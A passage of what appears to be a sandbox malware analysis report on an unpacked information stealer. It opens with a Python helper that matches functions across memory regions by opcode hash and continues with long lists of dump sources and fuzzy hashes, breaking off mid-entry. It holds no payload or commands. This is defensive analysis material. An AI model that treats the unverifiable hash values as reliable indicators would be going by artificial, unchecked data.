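        if backed and unbacked:
            matches[opcode_id] = {
                "pe_offsets": sorted({e["offset"] for e in backed}),
                "unbacked_offsets": sorted({e["offset"] for e in unbacked}),
                "instruction_ids_differ": len({e["instruction_id"] for e in group}) > 1,
            }
    return matches


def summarize(matches):
    """Human-readable lines, one per cross-region function."""
    lines = []
    for opcode_id, info in sorted(matches.items()):
        lines.append("%s... image=%s unbacked=%s operands_differ=%s" % (
            opcode_id[:8],
            ",".join("0x%08X" % o for o in info["pe_offsets"]),
            ",".join("0x%08X" % o for o in info["unbacked_offsets"]),
            info["instruction_ids_differ"]))
    return lines


if __name__ == "__main__":
    for line in summarize(cross_region_matches(parse_entries(SAMPLE))):
        print(line)
```

Run against the full report text instead of SAMPLE, the same grouping gives a list of functions that survived unpacking unchanged at the opcode level, which is a useful starting set when you want to diff the on-disk stub against the in-memory payload or to write a rule that is indifferent to relocation. Functions seen only at 0x00AE0000 (afec766a… in the sample) are the more interesting ones for a stealer like this, since they never existed in the file-backed image.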
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1856080903.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_ae0000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: a7540190068c50c970c78dd1fb816c39bd2abd836d4de7d463699aecd841a6eb
                                                                                                                                                                                                                                                                          • Instruction ID: df50e1928215f05d951ef23409539016739419ef2ffd7576fdf902998951f297
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a7540190068c50c970c78dd1fb816c39bd2abd836d4de7d463699aecd841a6eb
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A4417EB26183908BD734CF24C85179FBBF2EBD1214F498E6C94DAAB345E73589058B87
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1856080903.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_ae0000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 184c9a32383a48190f2719d2aadad879d32520f34a2a0851a9020504aa8db94d
                                                                                                                                                                                                                                                                          • Instruction ID: 826407ac5e0dd1f0df7841274472d750163b08efd00425c0fc645b1067ed1824
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 184c9a32383a48190f2719d2aadad879d32520f34a2a0851a9020504aa8db94d
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 68317FA01183D18ADB358F259060BFBBFE0AF93219F1489EDC2D6A7693D7344447CB5A
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1856080903.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_ae0000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: e0dc337c31b60e59c40b3c4b66153a54b5a75c190226419d79e85c67cff8ed99
                                                                                                                                                                                                                                                                          • Instruction ID: 1353773af2514649b590c7878efbcb71fd2a41214169596f3e9d3389f7dfdb4c
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e0dc337c31b60e59c40b3c4b66153a54b5a75c190226419d79e85c67cff8ed99
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 003109741193C14BD7B94B285860BBABFD2DF93304F285AACD0CA4B1D2DB254C45CB56
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1855825819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1855825819.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                          • Opcode ID: 888aa382685d0caeac7857589a895e4d05e9bcb5ed8514602e835cd5541883fc
                                                                                                                                                                                                                                                                          • Instruction ID: d85d8e7ba49753ff7f36d3ed97c285ab1e5e24199585a0ad528ba1d19501f263
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 888aa382685d0caeac7857589a895e4d05e9bcb5ed8514602e835cd5541883fc
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B7313B602083A15BD3B58B2864B077F7BD2DF87304F68496DD0C9872A2D7289485C74E
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1855825819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1855825819.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 184c9a32383a48190f2719d2aadad879d32520f34a2a0851a9020504aa8db94d
                                                                                                                                                                                                                                                                          • Instruction ID: eb231649460b60e8b645cff36354959ad8fc4f47b4bc3ecb8744b755d441be80
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 184c9a32383a48190f2719d2aadad879d32520f34a2a0851a9020504aa8db94d
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AC3191A02083E18BDB358F2491207FBBBE0AB93259F54499DC7D9A7683D7384017CB5E
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1856080903.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_ae0000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 546c49f651c2ee0ec7203154adbd460b810419c4e5ed9a3c8b647bf01d903c3f
                                                                                                                                                                                                                                                                          • Instruction ID: 5bea288419d25e331693870aff254cdfdc827aef98e3469463e06181867feca1
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 546c49f651c2ee0ec7203154adbd460b810419c4e5ed9a3c8b647bf01d903c3f
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6A3174323183048FC324CF648C8067ABB92EB92744F1C85BED9C543B82DB75CE018742
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1856080903.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_ae0000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 9879a937105e083bd9aef7d9b8e876d5a873d896f238b78d14b88aad6da131cd
                                                                                                                                                                                                                                                                          • Instruction ID: 01f68c826634c531da2c8faab51d4b7c063a96f94b6c316bb8a5b318c5399318
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9879a937105e083bd9aef7d9b8e876d5a873d896f238b78d14b88aad6da131cd
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5D31F7346185419BE725AB1A8C40B3677B3FBC6340F68D63CE0C2832A4DE30AC518754
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1855825819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1855825819.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                          • Opcode ID: 8b6e21541edddda7d0cafdb5479713d3008093deab5e063b60f74b86252a7a36
                                                                                                                                                                                                                                                                          • Instruction ID: 608a5c001c9016f47e6d849a3a7bf8eb37f8ca910ed307557679ae7e480cd3ab
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8b6e21541edddda7d0cafdb5479713d3008093deab5e063b60f74b86252a7a36
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9F31F139E146009AE325AB598C807377753FBC7300F68D13EE092A32E9DA38AC16874D
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1856080903.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_ae0000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 9112804f8139e9297ba88e3742caefcf6529a162b57808c6ac39dfffa7ef667e
                                                                                                                                                                                                                                                                          • Instruction ID: c15074340de53376e7a72fe60479440301fcc6f103e40041163cb2b45f185aad
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9112804f8139e9297ba88e3742caefcf6529a162b57808c6ac39dfffa7ef667e
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4C213921B087910BD718DE3988D166BFBD3DBDB224F48C67EC4A28B6D5DA30D9058688
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1855825819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1855825819.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 9112804f8139e9297ba88e3742caefcf6529a162b57808c6ac39dfffa7ef667e
                                                                                                                                                                                                                                                                          • Instruction ID: 4f1d9a8e55b01d87ed81b452fa3618ff49b1b83c19e4b1c484c24ed6b64955da
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9112804f8139e9297ba88e3742caefcf6529a162b57808c6ac39dfffa7ef667e
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 78212921718B550BD728DE3988D132BF7D39BCB210F48D63EC5938B2D6CA34D9054688
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1856080903.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_ae0000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: fbddf629d58ab5b7ce3c6d341b6087eefabcc06d9ed1031e48f954126914271b
                                                                                                                                                                                                                                                                          • Instruction ID: 1541a82c6766fbf3c251795dd2036387ccc6d3a3b4bb33a3d2bd31292a9fa64d
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fbddf629d58ab5b7ce3c6d341b6087eefabcc06d9ed1031e48f954126914271b
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C021F334614B019FD364CF28C880B37B7E3EBD6720F248668E5959B699DB30EC42DB44
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1855825819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1855825819.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 201c4f8f0819f68cd48f73e785265dbdbac7085615a68ae6b401f2b6715c5eb6
                                                                                                                                                                                                                                                                          • Instruction ID: c284272cbe1354c2bac86839248cf07ee5637eab11ef42c9faf85a1953e6744e
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 201c4f8f0819f68cd48f73e785265dbdbac7085615a68ae6b401f2b6715c5eb6
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B521217AA08225CFCB04DF24E88466AF3A0FF4A714F5A947ED5858B241D3309E90CF86
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1856080903.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_ae0000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: c3217eddf26d73e13bed4335cf48e091058d425e1d7b0796f7844dc1e666736a
                                                                                                                                                                                                                                                                          • Instruction ID: eb69a61400dca2a7fdf9e5f2310de7dbf2c510bd2b0cb98f3dfffd7d0bae3635
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c3217eddf26d73e13bed4335cf48e091058d425e1d7b0796f7844dc1e666736a
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6B110E316543409BCB288F64DCE1A7FBBE1EB9A300F88947CA5D2C3AA1C274C8408F46
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1856080903.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_ae0000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 44c97935eddf75c305e2d2b65cd8ba00c8eb118628fa0640b3156059a25bc93e
                                                                                                                                                                                                                                                                          • Instruction ID: 72b3ad3c6a9694c07e8125ad01900727b2d8873e31a06a3c7fc39b0d3a5ca142
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 44c97935eddf75c305e2d2b65cd8ba00c8eb118628fa0640b3156059a25bc93e
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 28114875A587448FC318EFA4ECC06BAB3E1EF8A310F29843C85EA47751EBA09D508649
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1855825819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1855825819.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 44c97935eddf75c305e2d2b65cd8ba00c8eb118628fa0640b3156059a25bc93e
                                                                                                                                                                                                                                                                          • Instruction ID: 20ca1e341728769f683a14c7d19e02f3155232ce684509dc4d83bd4e8ff0b8df
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 44c97935eddf75c305e2d2b65cd8ba00c8eb118628fa0640b3156059a25bc93e
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 72112575A587048FC318EFA4ACC837BB3A4EB8A311F29953D86A647350DB608D118689

Memory Dump Source
• Source File: 00000003.00000002.1856080903.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_ae0000_3247.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: f5c82fc671e06e79b78df2e2b48bef573e4aa83533a2b75342557a0be53bb444
• Instruction ID: 6acfa36fb68d04b0255a8f0bab2e0489fbea7c584849398d60337c5be76feae7
• Opcode Fuzzy Hash: f5c82fc671e06e79b78df2e2b48bef573e4aa83533a2b75342557a0be53bb444
• Instruction Fuzzy Hash: 95012230B05340AAF3684B288C51B3BB3A3E7DAB40F65912CF2819B1D1EE709C418B86

Memory Dump Source
• Source File: 00000003.00000002.1856080903.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_ae0000_3247.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
• Instruction ID: 67ca1113df6e86fe0c46858120d7cc80ce43b73b001aca31fcf204f71bc3eefb
• Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
• Instruction Fuzzy Hash: E1110A33A041D04DC3129D3C84005B47FE30AA3634B5943E9F4B5971D2D6238ECA8350

Memory Dump Source
• Source File: 00000003.00000002.1855825819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1855825819.0000000000452000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_3247.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
• Instruction ID: b28cf3c768fcd90dd8a03dd2320e21e507999ec1ebf4a65f37eb71fdd5601da6
• Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
• Instruction Fuzzy Hash: E011EC336051D41EC3268D3C8400565BF930AA7636F5953DAF4B49B3D2D52A8E8A8759

Memory Dump Source
• Source File: 00000003.00000002.1856080903.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_ae0000_3247.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: babb52ce3867e81688af6e2cbfc925ee92a6f3f8cd139ab93b6cbf9c46b7bedb
• Instruction ID: 633bd925207093b4d148dddf0af5cf42b810d87bc460cef3e81cd929249b3178
• Opcode Fuzzy Hash: babb52ce3867e81688af6e2cbfc925ee92a6f3f8cd139ab93b6cbf9c46b7bedb
• Instruction Fuzzy Hash: DF017CF1A0034157F730AE5585C1B3BBAE8EF91714F18456CE90997282DB76EC06C6A5

Memory Dump Source
• Source File: 00000003.00000002.1856080903.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_ae0000_3247.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 08b4345849cd0f47e80d1ed5c22eab79d945ad8a979d27bd12cd0f1252f48fec
• Instruction ID: 1ab1112a9366718ba32d7ba64cd268feeaccf43a4543b903d3ed202fd5a6d66f
• Opcode Fuzzy Hash: 08b4345849cd0f47e80d1ed5c22eab79d945ad8a979d27bd12cd0f1252f48fec
• Instruction Fuzzy Hash: D911E2367547404BD728CF68D8E16BBB7E1DB9A301F59A43C9882C3791CAB8C9458B46

Memory Dump Source
• Source File: 00000003.00000002.1855825819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1855825819.0000000000452000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_3247.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: d722c01a8bd2e68c804006294bc8a0889be745f601f03f4d9d5de63ddc943046
• Instruction ID: 55029b9e38fdfb0df3b4b8151af6569af59bc0d0f5a25f3444c4cc7de86b0466
• Opcode Fuzzy Hash: d722c01a8bd2e68c804006294bc8a0889be745f601f03f4d9d5de63ddc943046
• Instruction Fuzzy Hash: E001B1F1B0035257DB209F55B4C1B27B2A86F95718F08443EE80867342DB7DFC44C2AA

Memory Dump Source
• Source File: 00000003.00000002.1856080903.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_ae0000_3247.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 358e2d3b4c42a0c731e3efba7596486553403020c12b89a5f8a1758b9ddfefcd
• Instruction ID: 521098cf378f58f6f43cc40978f57a2d331252a6634728ad661dff03e33152b8
• Opcode Fuzzy Hash: 358e2d3b4c42a0c731e3efba7596486553403020c12b89a5f8a1758b9ddfefcd
• Instruction Fuzzy Hash: 991189756042009BE3209F24CCC0E7BBBE6EBE6700F649478E6C097291DA30CCD297A7

Memory Dump Source
• Source File: 00000003.00000002.1856080903.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_ae0000_3247.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 9189c4c3175398eb84fc80681e1c6dfaa05d9782f835bdc2878a97ad02b88055
• Instruction ID: 32851bee810be1cf1a6dc4a32f1d5e0743ccd2a68139d787febb147a608d0043
• Opcode Fuzzy Hash: 9189c4c3175398eb84fc80681e1c6dfaa05d9782f835bdc2878a97ad02b88055
• Instruction Fuzzy Hash: 8B11A371608381ABD7149F29DD9067FBBE2EBC2364F15AE2CE59653790C630C841CB0A
Memory Dump Source
• Source File: 00000003.00000002.1856080903.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_ae0000_3247.jbxd
Yara matches
Similarity
Memory Dump Source
• Source File: 00000003.00000002.1855825819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1855825819.0000000000452000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_3247.jbxd
Yara matches
Similarity
Memory Dump Source
• Source File: 00000003.00000002.1855825819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1855825819.0000000000452000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_3247.jbxd
Yara matches
Similarity
Memory Dump Source
• Source File: 00000003.00000002.1856080903.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_ae0000_3247.jbxd
Yara matches
Similarity
Memory Dump Source
• Source File: 00000003.00000002.1856080903.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_ae0000_3247.jbxd
Yara matches
Similarity
Memory Dump Source
• Source File: 00000003.00000002.1856080903.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_ae0000_3247.jbxd
Yara matches
Similarity
Memory Dump Source
• Source File: 00000003.00000002.1855825819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1855825819.0000000000452000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_3247.jbxd
Yara matches
Similarity
Memory Dump Source
• Source File: 00000003.00000002.1856080903.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_ae0000_3247.jbxd
Yara matches
Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 130b8f035e0f9caf36d69ffe2fe00e5717c81f35e5d13109d0f780a603360f32
                                                                                                                                                                                                                                                                          • Instruction ID: 3d8003c947350f763e57d7275abebc7f7ffccd5f05503287323170f86c907adb
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 130b8f035e0f9caf36d69ffe2fe00e5717c81f35e5d13109d0f780a603360f32
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 93F0A735B456808BE704CF38E83199ABBE2E387324F155A7DD641D3751D739D8018605
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1855825819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1855825819.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 130b8f035e0f9caf36d69ffe2fe00e5717c81f35e5d13109d0f780a603360f32
                                                                                                                                                                                                                                                                          • Instruction ID: fe1efda9bcc16308283c5424634e62067ac2dc8fe4a9505e7820fcb65e305570
